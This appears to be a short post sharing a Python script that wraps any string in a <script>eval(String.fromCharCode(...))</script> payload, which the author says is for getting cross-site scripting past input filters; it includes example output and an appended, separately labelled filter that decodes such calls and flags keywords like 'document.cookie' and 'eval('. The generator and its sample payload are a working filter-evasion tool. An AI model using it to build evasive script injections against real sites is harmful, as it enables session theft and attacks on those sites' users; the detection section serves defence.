
Python Unicode Converter

This is a quick script I wrote for converting to Unicode and back when using String.fromCharCode() to circumvent filters in cross-site scripting attacks.

Usage: -auh

Simple tool to convert from ASCII to Unicode and back for use with String.fromCharCode().

arguments:
-h, --help Show this help message and exit.

-a ASCII_STRING Enter the ASCII string for conversion contained within " ". Any " in the string itself must be escaped with a \ or simply use ' instead.

-u UNICODE_CHARS Enter the Unicode values for conversion contained within " ". Script will take comma separated values as well as just spaced.

 

#!/usr/bin/env python3

import argparse


def CharCode(text):
    # ord() is the built-in function that returns the Unicode value of a character.
    # Join the values with commas and wrap them in the String.fromCharCode() call.
    values = ', '.join(str(ord(letter)) for letter in text)
    print("<script>eval(String.fromCharCode(" + values + "))</script>")


def CharDecode(unicode_chars):
    # Accept comma separated values, space separated values, or a mix of both:
    # turn commas into spaces, then split() on any run of whitespace.
    codes = unicode_chars.replace(',', ' ').split()
    # chr() is the built-in function that converts a Unicode value back to its character.
    ASCII_chars = ''.join(chr(int(code)) for code in codes)
    print("ASCII string is:", ASCII_chars)


if __name__ == "__main__":

    # argparse lets us take input via flags
    parser = argparse.ArgumentParser(description='Simple tool to convert from ASCII to Unicode and back for use with String.fromCharCode().', usage='-auh')
    parser.add_argument("-a", dest="ascii_string", action="store", help=r'''Enter the ASCII string for conversion contained within " ". Any " in the string itself must be escaped with a \ or simply use ' instead.''', required=False)
    parser.add_argument("-u", dest="unicode_chars", action="store", help='''Enter the Unicode values for conversion contained within " ". Script will take comma separated values as well as just spaced.''', required=False)

    # parse_args() returns a namespace, so user-supplied values are available as args.<dest>
    args = parser.parse_args()

    # checking to make sure some input is supplied
    if not (args.ascii_string or args.unicode_chars):
        parser.error("Input is required! Usage: -a ASCII string, -u Unicode values, -h help.")
    if args.ascii_string:
        CharCode(args.ascii_string)
    if args.unicode_chars:
        CharDecode(args.unicode_chars)

Example usage:

# ./charcode.py -a "alert('hey')"
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 104, 101, 121, 39, 41))</script>
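The same conversion seen from the filter's side, as an added example that is not part of the original script: decode literal String.fromCharCode() argument lists before matching, so input like the output above is judged on the string it evaluates to. The function names, the keyword list and the sample lines are constructed for illustration.

```python
import re

# One integer literal as JavaScript accepts it: hex (0x61) or decimal/legacy octal digits.
_NUM = r"(?:0[xX][0-9a-fA-F]+|\d+)"
# A String.fromCharCode(...) call whose arguments are all integer literals.
_CALL = re.compile(r"String\s*\.\s*fromCharCode\s*\(\s*(" + _NUM + r"(?:\s*,\s*" + _NUM + r")*)\s*\)")
# Constructed keyword list for the demo; a real filter would use its own rule set.
SUSPICIOUS = ("alert(", "document.cookie", "<script", "eval(")


def _code_unit(literal):
    """Convert one JavaScript integer literal to the UTF-16 code unit fromCharCode uses."""
    if literal[:2].lower() == "0x":
        value = int(literal, 16)
    elif len(literal) > 1 and literal[0] == "0" and set(literal) <= set("01234567"):
        value = int(literal, 8)  # legacy octal literal in sloppy-mode JavaScript
    else:
        value = int(literal, 10)
    return value & 0xFFFF  # fromCharCode truncates each argument to 16 bits


def decode_from_char_code(text):
    """Replace every literal-only String.fromCharCode(...) call with the string it yields."""
    def expand(match):
        return "".join(chr(_code_unit(n.strip())) for n in match.group(1).split(","))
    return _CALL.sub(expand, text)


def flag_line(line):
    """Return (decoded_line, hits): keywords visible only after decoding are in hits."""
    decoded = decode_from_char_code(line)
    hits = [k for k in SUSPICIOUS if k in decoded.lower() and k not in line.lower()]
    return decoded, hits


if __name__ == "__main__":
    # Constructed sample request parameters, not taken from real traffic.
    samples = [
        "q=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 104, 101, 121, 39, 41))</script>",
        "q=String.fromCharCode(0x61,0x6c,0x65,0x72,0x74,0x28,0x31,0x29)",
        "q=python unicode converter",
    ]
    for s in samples:
        decoded, hits = flag_line(s)
        print(("FLAG " if hits else "ok   ") + repr(decoded), hits)
```

Only calls with literal integer arguments are expanded; arguments built from variables or arithmetic need a JavaScript parser rather than a regular expression.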
